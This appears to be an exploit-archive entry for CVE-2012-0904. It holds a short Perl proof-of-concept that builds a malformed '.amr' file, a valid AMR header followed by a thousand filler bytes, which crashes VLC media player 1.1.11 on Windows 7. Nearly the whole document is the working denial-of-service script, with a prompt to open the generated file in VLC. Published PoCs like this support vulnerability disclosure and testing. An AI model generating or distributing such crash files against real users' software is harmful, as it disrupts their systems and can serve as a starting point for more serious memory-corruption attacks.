VideoLAN VLC Media Player 1.1.11 - '.amr' Denial of Service (PoC)

Related Vulnerabilities: CVE-2012-0904  
Publish Date: 04 Jan 2012
Author: Fabi@habsec

# Exploit Title: VLC media player v1.1.11 (.amr) Local Crash PoC
# Date: 04.01.2012
# Author: Fabi@habsec (
# Software Link:
# Version: 1.1.11
# Tested on: Windows 7 x86 English
# Description: Unhandled Access Violation Exception loading generated .amr file
#              - 1.1.10 not affected!
system("title VLC .amr crash PoC");
print "\n";                  
print " [*] Name : VLC media player v1.1.11 (Adaptive Multi-Rate)\n";
print " [*] Exploit : Local Crash PoC                            \n";
print "\n";
my $amr_boof = "\x23\x21\x41\x4D\x52"; # Treat as AMR 
$amr_boof .= "\x41"x1000; # j4f
open(file , ">", "b00f.amr");
print file $amr_boof;
print "  [+] File successfully created! Open in VLC or drag to playlist..\n" or die print "\n Wuups- Could not create File.. ";
#Hannibal ante portas